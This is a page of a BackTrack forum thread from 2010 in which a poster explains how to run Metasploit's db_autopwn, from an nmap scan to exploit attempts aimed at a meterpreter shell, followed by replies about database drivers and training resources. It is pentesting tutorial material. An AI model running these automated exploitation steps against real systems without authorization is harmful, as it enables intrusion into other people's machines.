Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Metasploit autopwn basics

  1. #1
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    15

    Default Metasploit autopwn basics

    MSF from the moment of its release is THE most powerful offensive tool in a pentesters arsenal. In this tutorial i plan to show how to use autopwn feature of MSF from scanning to getting a meterpreter shell.

    Lets boot up trusty ol BT4 R1. Bring up your favourite terminal emulator.

    Code:
    cd /pentest/exploits/framework3
    We'll use msf console because its much less cluttered than GUI.
    Code:
    ./msfconsole
    wait a few minutes for MSF to load all modules and exploits.
    Now that we have the msfconsole up and running we need to select a database driver to store info about our target..i prefer sqlite3 cause it doesnt need any further setup for me
    Code:
    db_driver sqlite3
    now we need to create a new database to store the info
    Code:
    db_create autopwn
    feel free to replace autopwn with any name
    Code:
    db_connect
    we are connected to the database.
    Run a simple nmap scan to enumerate the host
    Code:
    db_nmap target
    to see host information
    Code:
    db_hosts
    AND finally for the actual autopwn jst run
    Code:
    db_autopwn -p -t -e
    and there you have it...if an exploit worked you'll have a session...
    if you dont well better luck next time

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Metasploit autopwn basics

    Op please see your PM box with a note from me. Thanks.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Metasploit autopwn basics

    It should be noted that the usage of sqlite3 is not supported by metasploit, and there are other forum threads regarding this --read postgres
    Last edited by sickness; 11-07-2010 at 08:53 PM.

  4. #4
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Metasploit autopwn basics

    A little help regarding what @iproute said: http://www.backtrack-linux.org/forum...ostgresql.html
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  5. #5
    Junior Member J4rll3y's Avatar
    Join Date
    Jul 2010
    Posts
    31

    Default Re: Metasploit autopwn basics

    Tanks for sharing

    Very good
    [s]

  6. #6
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    15

    Default Re: Metasploit autopwn basics

    Sorry about using sqlite3.didnt kno it was supported.. in my box it runs without a hitch tho..but other drivers dont run outof the box..this was before i saw sickness' post on postgreSQL of course...

  7. #7
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Metasploit autopwn basics

    there are some reasons one might want to use sqlite instead of postgres or mysql for metasploit, but with the latter two, running db_autopwn will likely be more effective. I've run the same autopwn against the same vulnerable VM and witnessed this myself.

    Also if you need to do reporting, sqlite may not be as well suited.

    A great resource for metasploit other than the most excellent metasploit framework unleashed course can be found by performing a google search for 'metasploit megaprimer'.

  8. #8
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Metasploit autopwn basics

    Actually the Metasploit Megaprimer can be found in the Video section here
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  9. #9
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Metasploit autopwn basics

    Quote Originally Posted by sickness View Post
    Actually the Metasploit Megaprimer can be found in the Video section here
    Fantastic series. Vivek was very complete and detailed with those.

    Also, when did you become a moderator sickness? Congrats!

  10. #10
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Metasploit autopwn basics

    Quote Originally Posted by iproute View Post
    Fantastic series. Vivek was very complete and detailed with those.
    Indeed, the Metasploit Megaprimer combined with the Metasploit Unleashed offers you the best free course for Metasploit.

    Quote Originally Posted by iproute View Post
    Also, when did you become a moderator sickness? Congrats!
    Recently and thanks
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

Page 1 of 2 12 LastLast

Similar Threads

  1. Metasploit and autopwn
    By MrCookie1 in forum BackTrack Bugs
    Replies: 2
    Last Post: 10-05-2010, 10:02 PM
  2. Replies: 1
    Last Post: 08-05-2010, 05:21 AM
  3. Metasploit Exploiting Framework – the basics
    By m-1-k-3 in forum Tutorials und Howtos
    Replies: 13
    Last Post: 01-20-2010, 01:16 AM
  4. autopwn in Metasploit 3.0
    By RoboticTao in forum OLD Newbie Area
    Replies: 1
    Last Post: 12-24-2007, 06:31 PM
  5. AUTOPWN in Metasploit
    By Vagabond in forum OLD Pentesting
    Replies: 2
    Last Post: 08-06-2007, 02:23 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •